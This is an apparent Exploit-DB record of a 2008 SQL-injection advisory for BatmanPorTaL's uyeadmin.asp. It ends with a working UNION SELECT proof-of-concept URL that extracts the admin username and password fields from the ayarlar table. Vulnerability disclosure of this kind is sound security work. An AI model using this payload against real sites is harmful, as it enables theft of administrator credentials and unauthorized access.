BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection

EDB-ID:

31745


Author:

U238

Type:

webapps


Platform:

PHP

Date:

2008-05-05


source: https://www.securityfocus.com/bid/29057/info

BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar